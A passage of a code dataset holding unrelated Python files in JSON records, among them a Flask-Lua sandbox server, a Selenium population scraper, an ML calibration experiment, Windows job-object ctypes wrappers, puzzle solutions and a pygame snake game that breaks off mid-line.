lua.eval(\"error\")\n sandbox['tonumber'] = lua.eval(\"tonumber\")\n sandbox['db'] = lua.eval(fdb_str.format(settings.MYSQL_DATABASE_DB, \"m{}\".format(data[0]), \"qwe123\"))()\n\n if request.method == 'POST':\n args = dict(request.form)\n else:\n args = dict(request.args)\n sandbox['args'] = lua.table_from(args)\n sandbox['method'] = request.method\n\n mod_settings = {}\n if data[3] == 1:\n cursor.execute(\"SELECT name, type, value FROM Module_setting WHERE module_id=%s\", (data[0],))\n sd = cursor.fetchall()\n for row in sd:\n val = row[2]\n if row[1] == 'int':\n val = int(val)\n elif row[1] == 'boolean':\n val = True if val == \"true\" else False\n mod_settings[row[0]] = val\n if len(mod_settings) != 0:\n sandbox['settings'] = lua.table_from(mod_settings)\n\n setfenv = lua.eval(\"setfenv\")\n setfenv(0, sandbox)\n\n with open(\"lua/modules/{}/{}.lua\".format(module_name, module_method)) as f:\n lua_code = f.read()\n try:\n method = lua.eval(lua_code)\n except lupa.LuaSyntaxError:\n return \"lua syntax error\"\n except:\n return \"error occurred\"\n try:\n res = to_dict(method())\n except lupa.LuaError as e:\n return \"lua error: {}\".format(e)\n except:\n return \"error occurred\"\n return json.dumps(res)\n\n\ndef to_dict(t1):\n for tu in t1.items():\n if lupa.lua_type(tu[1]) == 'table':\n t1[tu[0]] = to_dict(tu[1])\n try:\n l = sorted(t1.keys())\n if len(l) != 0 and l == range(1, l[-1] + 1):\n return list(t1.values())\n except TypeError:\n pass\n return dict(t1)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"server_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6634304","text":"#!/usr/bin/env python3\n\nuser1 = {\"name\": \"Chris\",\n \"city\": \"Seattle\",\n \"cake\": \"Chololate\"}\n\n\ndef dict1(user_input):\n print(user_input)\n user_input.pop(\"cake\")\n print(user_input)\n user_input.update({\"fruit\": \"Mango\"})\n print(user_input.keys())\n print(user_input.values())\n print(\"cake\" in user_input.keys())\n print(\"Mango\" in user_input.values())\n\n\ndef dict2(user_input):\n for key, val in user_input.items():\n print(\"%s: %s\" % (key, val.lower().count('t')))\n\n\ndef sets_1():\n s2 = set()\n s3 = set()\n s4 = set()\n for num in range(1, 21):\n if num % 2 == 0:\n s2.update([num])\n if num % 3 == 0:\n s3.update([num])\n if num % 4 == 0:\n s4.update([num])\n print(s2)\n print(s3)\n print(s4)\n print(s3.issubset(s2))\n print(s4.issubset(s2))\n\n\ndef sets_2():\n py_set = set('python')\n py_set.update(['i'])\n print(py_set)\n\n fs = frozenset('marathon')\n union_set = fs.union(py_set)\n inter_set = fs.intersection(py_set)\n print(union_set)\n print(inter_set)\n\nsets_2()\n\n","sub_path":"students/chrissp/lesson04/dict_lab.py","file_name":"dict_lab.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631398063","text":"from selenium import webdriver\r\nimport pandas as pd\r\nimport time\r\nimport os\r\n\r\nbrowser = webdriver.Chrome(\"B:\\\\Alien Brain\\\\Python Warm-Up\\\\chromedriver.exe\")\r\nbrowser.get(\"https://www.worldometers.info/population/countries-in-asia-by-population/\")\r\ntime.sleep(5)\r\n\r\ndf = pd.DataFrame(columns=['Rank','Country','Population','Yearly Change','Net Change','Density(P/Km²)','Land Area(Km²)','Migrants(net)','Fert.Rate','Med.Age','UrbanPop %','World Share'])\r\n\r\nfor i in browser.find_elements_by_xpath('//*[@id=\"example2\"]/tbody/tr'):\r\n\ttd_list = i.find_elements_by_tag_name('td')\r\n\trow = []\r\n\tfor td in td_list:\r\n\t\trow.append(td.text)\r\n\tdata = {}\r\n\tfor j in range(len(df.columns)):\r\n\t\tdata[df.columns[j]] = row[j]\r\n\tdf=df.append(data,ignore_index=True)\r\n\r\nbrowser.close()\r\nprint(df)\r\n\r\nbase_path='B:\\\\Alien Brain\\\\Python Warm-Up'\r\n\r\npath=os.path.join(base_path,'Dataset1.csv')\r\n#os.mkdir(path)\r\ndf.to_csv(path, index = False)\r\nprint(\"The dataset has been saved at the loction: \"+path)\r\n","sub_path":"Challenge7 - Asian Country Population Information.py","file_name":"Challenge7 - Asian Country Population Information.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"536164785","text":"from sklearn.model_selection import StratifiedKFold\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.dummy import DummyClassifier\n\nfrom pandas import read_csv, DataFrame\nimport numpy as np\n\nimport os\nimport sys\nfrom autoclf import auto_utils as au\nfrom autoclf.classification import eval_utils as eu\nfrom autoclf.classification import param_grids_distros as pgd\nfrom autoclf.classification import train_calibrate as tc\nimport autoclf.getargs as ga\nfrom pkg_resources import resource_string\nfrom io import StringIO\n\n\n# starting program\nif __name__ == '__main__':\n\n print()\n print(\"### Probability Calibration Experiment -- CalibratedClassifierCV \"\n \"with cv=cv (no prefit) ###\")\n print()\n\n d_name = ga.get_name()\n\n if d_name is None:\n d_name = \"OttoG\"\n\n seed = 7\n np.random.seed(seed)\n\n try:\n df = read_csv(\"datasets/otto_group_train.csv\", delimiter=\",\")\n except FileNotFoundError as fe:\n ottog_bytes = resource_string(\n \"autoclf\", os.path.join(\"datasets\", 'otto_group_train.csv'))\n ottog_file = StringIO(str(ottog_bytes,'utf-8'))\n\n df = read_csv(ottog_file, delimiter=\",\")\n except Exception as e:\n raise e\n\n print(df.shape)\n\n print(\"Dataframe description - no encoding:\\n\", df.describe())\n print()\n\n print()\n print(\"=== [task] Train-test split + early pre-processing.\")\n print()\n\n # Missing Attribute Values: None\n\n ###\n df = df.drop(['id'], axis=1)\n print(df.shape)\n\n description = df.describe()\n print(\"Description - no encoding:\\n\", description)\n\n print()\n\n target = 'target'\n\n # feature engineering\n\n sltt = eu.scoring_and_tt_split(df, target, 0.2, seed)\n\n X_train, X_test, y_train, y_test = sltt['arrays']\n scoring = sltt['scoring']\n Y_type = sltt['target_type']\n labels = sltt['labels']\n\n print()\n print(\"X_train shape: \", X_train.shape)\n print(\"X_train -- first row:\", X_train.values[0])\n print(\"y_train shape: \", y_train.shape)\n print()\n\n print(\"X_test shape: \", X_test.shape)\n print(\"X_test -- first row:\", X_test.values[0])\n print(\"y_test shape: \", y_test.shape)\n print()\n\n print(y_train[:3])\n # input(\"Enter key to continue... \\n\")\n\n print()\n print(\"scoring:\", scoring)\n print()\n\n auto_feat_eng_data = eu.auto_X_encoding(sltt, seed)\n\n encoding = auto_feat_eng_data['encoding']\n scaler_tuple = auto_feat_eng_data['scaler']\n featselector = auto_feat_eng_data['feat_selector']\n steps = auto_feat_eng_data['steps']\n X_train_transformed, y_train, X_test_transformed, y_test =\\\n auto_feat_eng_data['data_arrays']\n X, y = auto_feat_eng_data['Xy']\n train_index, test_index = auto_feat_eng_data['tt_index']\n\n n_splits = au.select_nr_of_splits_for_kfold_cv()\n n_iter = au.select_nr_of_iterations()\n\n inner_cv = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)\n outer_cv = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)\n\n ### reproducing the whole autoclf workflow\n\n names = []\n results = []\n\n print(\"Metric:\", scoring)\n print(\"Calibration of untrained models -- CCCV 2nd\")\n print()\n\n best_atts = eu.best_model_initial_attributes(scoring, n_splits)\n\n best_score, best_score_dev, best_cv_results, best_model_name = best_atts\n\n best_exec_time = 31536000 # one year in seconds\n best_model = (best_model_name, None, None)\n\n Dummy_scores = []\n\n models_data = []\n names = []\n results = []\n\n scores_of_worst_model = (best_score, best_score_dev, best_cv_results,\n best_exec_time, best_model)\n\n scores_of_best_model = scores_of_worst_model\n\n average_scores_and_best_scores = dict()\n average_scores_and_best_scores[best_model_name] \\\n = (best_score, best_score_dev, best_exec_time, best_model, {})\n\n # Start evaluation process\n\n print()\n print(\"=== [task] Evaluation of DummyClassifier\")\n print()\n\n wtr = eu.calculate_sample_weight(y_train)\n\n strategy = 'stratified' # 'most_frequent'\n\n evaluation_result = eu.single_classic_cv_evaluation(\n X_train_transformed, y_train, 'DummyClf_2nd',\n DummyClassifier(strategy=strategy), wtr, scoring, outer_cv,\n dict(), scores_of_best_model, results, names, seed)\n\n average_scores_and_best_scores = evaluation_result[0]\n scores_of_best_model = evaluation_result[1]\n\n Dummy_scores.append(scores_of_best_model[0]) # Dummy score -- ROC_AUC\n Dummy_scores.append(scores_of_best_model[1]) # Dummy score std\n Dummy_scores.append(scores_of_best_model[2]) # Dummy cv results\n Dummy_scores.append(scores_of_best_model[3]) # Dummy execution time\n # Dummy model's name and estimator\n Dummy_scores.append(scores_of_best_model[4])\n\n names = []\n results = []\n\n print()\n\n all_models_and_parameters = dict()\n\n # replace with name from pgd.full_search_models_and_parameters\n test_model_name = 'model_from_param_grids_distros' # 'KNeighborsClf_2nd'\n\n print(\"=== [task] Comparing DummyClassifier to KNeighborsClassifier\")\n print()\n\n evaluation_result = eu.single_nested_rscv_evaluation(\n X_train_transformed, y_train, test_model_name,\n pgd.full_search_models_and_parameters[test_model_name][0], \n pgd.full_search_models_and_parameters[test_model_name][1],\n wtr, scoring, n_iter, inner_cv, outer_cv, \n average_scores_and_best_scores, scores_of_best_model, \n results, names, seed)\n\n print()\n au.box_plots_of_models_performance(results, names)\n\n print()\n print(\"=== After Non-nested CV evaluation of %s...\" % test_model_name)\n print()\n\n scores_of_best_model = evaluation_result[1]\n\n best_model_name = scores_of_best_model[4][0]\n best_model_estim = scores_of_best_model[4][1]\n\n best_score = scores_of_best_model[0]\n best_score_dev = scores_of_best_model[1]\n best_cv_results = scores_of_best_model[2]\n best_exec_time = scores_of_best_model[3]\n\n Dummy_score = Dummy_scores[0]\n Dummy_score_dev = Dummy_scores[1]\n Dummy_cv_results = Dummy_scores[2]\n Dummy_exec_time = Dummy_scores[3]\n\n print()\n print(\"Currently, best model is '%s' with score '%s': %1.3f (%1.3f)... :\" %\n (best_model_name, scoring.strip('neg_'), best_score, best_score_dev))\n print(\"... execution time: %.2fs\" % best_exec_time)\n # print(\"and prediction confidence: %1.3f\" % best_brier_score)\n print()\n\n if best_model_name != 'DummyClf_2nd':\n # It's assumed best model's performance is\n # satistically better than that of DummyClf on this dataset\n print(\"DummyClassifier's scores -- '%s': %1.3f (%1.3f)\" % (\n scoring.strip('neg_'), Dummy_score, Dummy_score_dev))\n print(\"'%s' does better than DummyClassifier.\" % best_model_name)\n if best_exec_time < Dummy_exec_time:\n print(\"'%s' is quicker than DummyClf.\" % best_model_name)\n print()\n print()\n input(\"Press key to continue...\")\n\n preprocessing = (encoding, scaler_tuple, featselector)\n\n all_models_and_parameters[best_model_name] = (\n best_model, pgd.full_search_models_and_parameters[best_model_name][1])\n\n if labels is not None:\n print(\"You have labels:\", labels)\n all_models_and_parameters['labels'] = labels\n\n print(\"Defined dictionary with models, parameters and related data.\")\n print()\n\n tc.tune_calibrate_best_model(\n X, y, X_train_transformed, X_test_transformed,\n y_train, y_test, auto_feat_eng_data['tt_index'], \n preprocessing, scores_of_best_model,\n all_models_and_parameters, n_splits, n_iter, 0,\n scoring, models_data, d_name, seed)\n else:\n sys.exit(\"Your best classifier is not a good classifier.\")\n\n input(\"=== [End Of Program] Enter key to continue... \\n\")","sub_path":"examples/ottog_knc_exp.py","file_name":"ottog_knc_exp.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594581882","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 00:48:45 2018\nFile Name: Project Euler - Problem 16\n@author: PianoManDan\n\nProblem: 2^15 = 32768, and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\n What is the sum of the digits of 2^1000\n\"\"\"\n\n\n# Define a function that takes a number and sums it's digits\n# PARAMETERS:\n# input n: integer whose digits are to be summed\n# ouput: the sum of the digits of n\n\ndef sumDigits(n):\n assert isinstance(n, int), \"Input must be an integer\"\n \n n = str(n)\n digits = []\n \n for i in range(len(n)):\n digits.append(int(n[i]))\n \n return sum(digits)\n\n\n# Calculate the sum of the digits of 2^1000 and print the answer to the console.\nans = sumDigits(2**1000)\n\nprint(\"The sum of the digits of 2^1000 is %d.\" %ans)\n","sub_path":"Problem 016.py","file_name":"Problem 016.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"511170300","text":"#\n# Copyright (C) 2017 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Python interfaces for win32 APIs.\"\"\"\nfrom __future__ import absolute_import\nfrom typing import Optional\n\nimport ctypes\nimport ctypes.wintypes\n\n\n# From winnt.h\nJOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE = 0x00002000\nJobObjectExtendedLimitInformation = 9\n\n\nclass IO_COUNTERS(ctypes.Structure):\n _fields_ = [\n ('ReadOperationCount', ctypes.c_ulonglong),\n ('WriteOperationCount', ctypes.c_ulonglong),\n ('OtherOperationCount', ctypes.c_ulonglong),\n ('ReadTransferCount', ctypes.c_ulonglong),\n ('WriteTransferCount', ctypes.c_ulonglong),\n ('OtherTransferCount', ctypes.c_ulonglong),\n ]\n\n\nclass JOBOBJECT_BASIC_LIMIT_INFORMATION(ctypes.Structure):\n _fields_ = [\n ('PerProcessUserTimeLimit', ctypes.wintypes.LARGE_INTEGER),\n ('PerJobUserTimeLimit', ctypes.wintypes.LARGE_INTEGER),\n ('LimitFlags', ctypes.wintypes.DWORD),\n ('MinimumWorkingSetSize', ctypes.c_size_t),\n ('MaximumWorkingSetSize', ctypes.c_size_t),\n ('ActiveProcessLimit', ctypes.wintypes.DWORD),\n ('Affinity', ctypes.POINTER(ctypes.c_ulong)),\n ('PriorityClass', ctypes.wintypes.DWORD),\n ('SchedulingClass', ctypes.wintypes.DWORD),\n ]\n\nclass JOBOBJECT_EXTENDED_LIMIT_INFORMATION(ctypes.Structure):\n _fields_ = [\n ('BasicLimitInformation', JOBOBJECT_BASIC_LIMIT_INFORMATION),\n ('IoInfo', IO_COUNTERS),\n ('ProcessMemoryLimit', ctypes.c_size_t),\n ('JobMemoryLimit', ctypes.c_size_t),\n ('PeakProcessMemoryUsed', ctypes.c_size_t),\n ('PeakJobMemoryUsed', ctypes.c_size_t),\n ]\n\n\n# mypy needs to ignore this line because this only typechecks successfully for\n# Windows.\nclass UseLastErrorWinDLL(ctypes.WinDLL): # type: ignore\n def __init__(self,\n name: str,\n mode: int = ctypes.DEFAULT_MODE,\n handle: int = None) -> None:\n super().__init__(name, mode, handle, use_last_error=True)\n\n_LOADER = ctypes.LibraryLoader(UseLastErrorWinDLL)\n\n\ndef CreateJobObject(attributes: Optional[ctypes.Structure] = None,\n name: str = None) -> ctypes.wintypes.HANDLE:\n fn_CreateJobObjectW = _LOADER.kernel32.CreateJobObjectW\n fn_CreateJobObjectW.restype = ctypes.wintypes.HANDLE\n fn_CreateJobObjectW.argtypes = [ctypes.c_void_p, ctypes.c_wchar_p]\n job = fn_CreateJobObjectW(attributes, name)\n if job is None:\n # Automatically calls GetLastError and FormatError for us to create the\n # WindowsError exception.\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n return job\n\n\ndef SetInformationJobObject(job: ctypes.wintypes.HANDLE, info_class: int,\n info: ctypes.Structure) -> None:\n fn_SetInformationJobObject = _LOADER.kernel32.SetInformationJobObject\n fn_SetInformationJobObject.restype = ctypes.wintypes.BOOL\n fn_SetInformationJobObject.argtypes = [\n ctypes.wintypes.HANDLE,\n ctypes.c_int,\n ctypes.c_void_p,\n ctypes.wintypes.DWORD\n ]\n result = fn_SetInformationJobObject(job, info_class, ctypes.pointer(info),\n ctypes.sizeof(info))\n if not result:\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n\n\ndef AssignProcessToJobObject(job: ctypes.wintypes.HANDLE,\n process: ctypes.wintypes.HANDLE) -> None:\n fn_AssignProcessToJobObject = _LOADER.kernel32.AssignProcessToJobObject\n fn_AssignProcessToJobObject.restype = ctypes.wintypes.BOOL\n fn_AssignProcessToJobObject.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.HANDLE]\n if not fn_AssignProcessToJobObject(job, process):\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n\n\ndef GetCurrentProcess() -> ctypes.wintypes.HANDLE:\n fn_GetCurrentProcess = _LOADER.kernel32.GetCurrentProcess\n fn_GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n return fn_GetCurrentProcess()\n\n\ndef CloseHandle(handle: ctypes.wintypes.HANDLE) -> None:\n fn_CloseHandle = _LOADER.kernel32.CloseHandle\n fn_CloseHandle.restype = ctypes.wintypes.BOOL\n fn_CloseHandle.argtypes = [ctypes.wintypes.HANDLE]\n if not fn_CloseHandle(handle):\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n","sub_path":"ndk/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176292649","text":"from numpy import loadtxt\nfrom pylab import scatter,xlabel,ylabel,show\n\n\ndata = loadtxt(\"millikan.txt\",float)\nx = data[:,0]\ny = data[:,0]\n\nscatter(x,y)\nxlabel(\"x\")\nylabel(\"y\")\nshow()\n","sub_path":"problem3-8a.py","file_name":"problem3-8a.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561513347","text":"import keyboard\r\nimport os\r\nimport time\r\nimport json\r\n\r\n\r\n# Map dimensions = X Y\r\n# = 1000\r\n\r\n\r\nPlocX = 500\r\nPlocY = 0\r\n\r\n\r\ndef header():\r\n print(\"\\n The Lazer Soldier\\n\" +\r\n \" --By Ihsan-- | \" +\r\n str(\"ll\") + \" FPS |\")\r\n print(\"X: \" + str(PlocX) + \" ,Y: \" + str(PlocY))\r\n print(\"_\" * 120)\r\n\r\n\r\ndef play(data):\r\n print(\"Data Loaded\")\r\n os.system(\"cls\")\r\n\r\n while True:\r\n header()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n os.system(\"titile 2D Game Adventurer | Made By Ihsan\")\r\n # file = open(\"data_2dgameadv.json\", \"+\")\r\n # data = json.JSONEncoder().encode(file.read)\r\n #\r\n # JSON Data structure\r\n # {\r\n # \"game\":{\r\n # [\r\n # {\r\n # \"name\":\"--name--\"\r\n # }\r\n # ]\r\n # }\r\n # }\r\n\r\n data = {}\r\n gamedata = {}\r\n number = 1\r\n\r\n while True:\r\n print(\" 2D Game Adventurer\")\r\n print(\" Made by Ihsan\\n\")\r\n print(\" 1. Continue saved game\")\r\n print(\" 2. New Game\")\r\n print(\" 3. Exit\\n\")\r\n\r\n inp = input(\"Choose: \")\r\n os.system(\"cls\")\r\n\r\n if inp == 1:\r\n if len(data[\"game\"]) != 0:\r\n while True:\r\n for a in data[\"game\"]:\r\n print(str(number) + a[\"name\"])\r\n inp = input(\"Choose: \")\r\n if not (int(inp) - 1) > len(data[\"game\"]):\r\n print(\"Loading Data...\")\r\n play(data[\"game\"])\r\n break\r\n\r\n # file.close()\r\n","sub_path":"old-codes/2dGameAdventurer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"1709634","text":"# http://adventofcode.com/2016/day/1\r\n\r\n# Part 1\r\n\r\ninstructions = \"R2, L1, R2, R1, R1, L3, R3, L5, L5, L2, L1, R4, R1, R3, L5, L5, R3, L4, L4, R5, R4, R3, L1, L2, R5, R4, L2, R1, R4, R4, L2, L1, L1, R190, R3, L4, R52, R5, R3, L5, R3, R2, R1, L5, L5, L4, R2, L3, R3, L1, L3, R5, L3, L4, R3, R77, R3, L2, R189, R4, R2, L2, R2, L1, R5, R4, R4, R2, L2, L2, L5, L1, R1, R2, L3, L4, L5, R1, L1, L2, L2, R2, L3, R3, L4, L1, L5, L4, L4, R3, R5, L2, R4, R5, R3, L2, L2, L4, L2, R2, L5, L4, R3, R1, L2, R2, R4, L1, L4, L4, L2, R2, L4, L1, L1, R4, L1, L3, L2, L2, L5, R5, R2, R5, L1, L5, R2, R4, R4, L2, R5, L5, R5, R5, L4, R2, R1, R1, R3, L3, L3, L4, L3, L2, L2, L2, R2, L1, L3, R2, R5, R5, L4, R3, L3, L4, R2, L5, R5\"\r\ninstructions_list = instructions.split(', ')\r\n\r\nlocation = [0, 0]\r\ndirection = 0 # Will be 0 for north, 90 for east, 180 for south, 270 for west\r\n\r\nfor instruction in instructions_list:\r\n if instruction[0] == 'R':\r\n direction += 90\r\n else: # instuction is always L or R so no need for elif block\r\n direction -= 90\r\n if direction == 360:\r\n direction = 0\r\n elif direction == -90:\r\n direction = 270\r\n distance = int(instruction[1:]) # everything except first character\r\n if direction == 0:\r\n location[1] += distance\r\n elif direction == 90:\r\n location[0] += distance\r\n elif direction == 180:\r\n location[1] -= distance\r\n else:\r\n location[0] -= distance\r\n \r\nprint(location) # gives final coordinates\r\nprint(abs(location[0]) + abs(location[1])) # distance from origin\r\n\r\n# Answer: We end up at {147, -87}, 234 blocks from origin.\r\n\r\n\r\n# Part 2\r\n\r\ninstructions = \"R2, L1, R2, R1, R1, L3, R3, L5, L5, L2, L1, R4, R1, R3, L5, L5, R3, L4, L4, R5, R4, R3, L1, L2, R5, R4, L2, R1, R4, R4, L2, L1, L1, R190, R3, L4, R52, R5, R3, L5, R3, R2, R1, L5, L5, L4, R2, L3, R3, L1, L3, R5, L3, L4, R3, R77, R3, L2, R189, R4, R2, L2, R2, L1, R5, R4, R4, R2, L2, L2, L5, L1, R1, R2, L3, L4, L5, R1, L1, L2, L2, R2, L3, R3, L4, L1, L5, L4, L4, R3, R5, L2, R4, R5, R3, L2, L2, L4, L2, R2, L5, L4, R3, R1, L2, R2, R4, L1, L4, L4, L2, R2, L4, L1, L1, R4, L1, L3, L2, L2, L5, R5, R2, R5, L1, L5, R2, R4, R4, L2, R5, L5, R5, R5, L4, R2, R1, R1, R3, L3, L3, L4, L3, L2, L2, L2, R2, L1, L3, R2, R5, R5, L4, R3, L3, L4, R2, L5, R5\"\r\ninstructions_list = instructions.split(', ')\r\n\r\nlocation = [0, 0]\r\ndirection = 0 # Will be 0 for north, 90 for east, 180 for south, 270 for west\r\nunique_locations = {(0, 0)}\r\neaster_bunny_hq = None\r\n\r\nfor instruction in instructions_list:\r\n if easter_bunny_hq is not None:\r\n break # exit main loop if easter_bunny_hq is found\r\n else:\r\n if instruction[0] == 'R':\r\n direction += 90\r\n else: # instuction is always L or R so no need for elif block\r\n direction -= 90\r\n if direction == 360:\r\n direction = 0\r\n elif direction == -90:\r\n direction = 270\r\n distance = int(instruction[1:]) # everything except first character\r\n for i in range(distance): # need to track each individual step taken\r\n if direction == 0:\r\n location[1] += 1\r\n elif direction == 90:\r\n location[0] += 1\r\n elif direction == 180:\r\n location[1] -= 1\r\n else:\r\n location[0] -= 1\r\n location_tuple = tuple(location)\r\n if location_tuple not in unique_locations:\r\n unique_locations.add(location_tuple)\r\n else:\r\n easter_bunny_hq = location_tuple\r\n break # exit inner loop when easter_bunny_hq is found\r\n\r\nprint(easter_bunny_hq) # gives final coordinates\r\nprint(abs(easter_bunny_hq[0]) + abs(easter_bunny_hq[1])) # distance from origin\r\n\r\n# Answer: We end up at (16, -97), 113 blocks from origin.\r\n\r\n","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137874905","text":"#The code was run on PYCHARM IDE on WINDOWS python version 3.x\n'''\nSteps to recreate:\n1)Open PYCHARM\n2)Create a new project\n3) Add a new python file and paste the code\n4) Run the code\n'''\nimport time\ndef merge(arr,left,mid,right):\n swaps=0\n l_arr=[]\n r_arr=[]\n n = mid-left+1\n m = right-mid\n for i in range(0,n):\n l_arr.append(arr[left+i])\n for j in range(0,m):\n r_arr.append(arr[mid+1+j])\n\n i=j=0\n k=left\n\n while i 690 or car[0][1] >= 660 or car[0][0] < 100 or car[0][1] < 20:\n if car[0][0] > 690:\n car[0] = (car[0][0] - 600, car[0][1])\n if car[0][1] >= 660:\n car[0] = (car[0][0], car[0][1] - 660)\n if car[0][0] < 100:\n car[0] = (car[0][0] + 600, car[0][1])\n if car[0][1] < 20:\n car[0] = (car[0][0], car[0][1] + 660)\n #game_over = True\n #break\n if car2[0][0] > 690 or car2[0][1] >= 660 or car2[0][0] < 100 or car2[0][1] < 20:\n if car2[0][0] > 690:\n car2[0] = (car2[0][0] - 600, car2[0][1])\n if car2[0][1] >= 660:\n car2[0] = (car2[0][0], car2[0][1] - 660)\n if car2[0][0] < 100:\n car2[0] = (car2[0][0] + 600, car2[0][1])\n if car2[0][1] < 20:\n car2[0] = (car2[0][0], car2[0][1] + 660)\n #game_over = True\n #break\n # checando empate\n if num_players == 2:\n if collision(car[0], car2[0]):\n explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n empate = True\n game_over = True\n break\n\n for i in range(1, len(car) - 1): #colisão entre player 1 em si mesmo\n if car[0][0] == car[i][0] and car[0][1] == car[i][1] and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player1 = True\n game_over = True\n break\n for i in range(1, len(car2) - 1): # colisão entre player 2 em si mesmo\n if car2[0][0] == car2[i][0] and car2[0][1] == car2[i][1] and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car2[0][0] - 5, car2[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player2 = True\n game_over = True\n break\n if num_players == 2:\n for i in range(1, len(car) - 1): #colisão entre cabeça do player 2 com a player 1\n if collision(car2[0], car[i]) and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car2[0][0] - 5, car2[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player2 = True\n game_over = True\n break\n if num_players == 2:\n for i in range(1, len(car2) - 1): #colisão entre cabeça do player 1 com o player 2\n if collision(car[0], car2[i]) and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player1 = True\n game_over = True\n break\n\n\n\n if game_over:\n break\n\n for c in range(len(car) - 1, 0, -1):\n car[c] = (car[c - 1][0], car[c - 1][1])\n\n for c in range(len(car2) - 1, 0, -1):\n car2[c] = (car2[c - 1][0], car2[c - 1][1])\n\n screen.fill((7, 8, 14)) # atualiza a tela pintando td de preto\n\n if escolha == 0:\n box = pygame.image.load(\"moeda_mario.png\")\n box_form = pygame.transform.scale(box, (10, 10))\n escolha2 = escolha\n if escolha == 1:\n box = pygame.image.load(\"sonic.png\")\n box_form = pygame.transform.scale(box, (13, 13))\n escolha2 = escolha\n if escolha == 2:\n box = pygame.image.load(\"cogumelo.png\")\n box_form = pygame.transform.scale(box, (13, 13))\n escolha2 = escolha\n\n\n if move == True:\n screen.blit(box_form, power_pos)\n\n '''pygame.draw.line(screen, (8, 232, 235), (599, 0), (599, 599))\n pygame.draw.line(screen, (8, 232, 235), (599, 1), (1, 1))\n pygame.draw.line(screen, (8, 232, 235), (1, 599), (1, 1))\n pygame.draw.line(screen, (8, 232, 235), (1, 599), (599, 599))'''\n\n pygame.draw.line(screen, (8, 232, 235), (99, 19), (700, 19))\n pygame.draw.line(screen, (8, 232, 235), (99, 19), (99, 680))\n pygame.draw.line(screen, (8, 232, 235), (99, 680), (700, 680))\n pygame.draw.line(screen, (8, 232, 235), (700, 680), (700, 19))\n\n pygame.draw.rect(screen, ([255, 0, 0]), [702, 0, 100, 700])\n pygame.draw.rect(screen, ([255, 0, 0]), [400, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [400, 681, 400, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [0, 0, 98, 700])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 300, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 300, 20])\n global score1\n global score2\n if score2 - score1 == 1:\n pygame.draw.rect(screen, ([255, 0, 0]), [300, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [300, 0, 400, 18])\n if score2 - score1 == 2:\n pygame.draw.rect(screen, ([255, 0, 0]), [200, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [200, 0, 400, 18])\n if score2 - score1 == 3:\n pygame.draw.rect(screen, ([255, 0, 0]), [100, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [100, 0, 400, 18])\n if score2 - score1 == 4:\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 500, 99, 200])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 0, 99, 200])\n if score2 - score1 > 4:\n 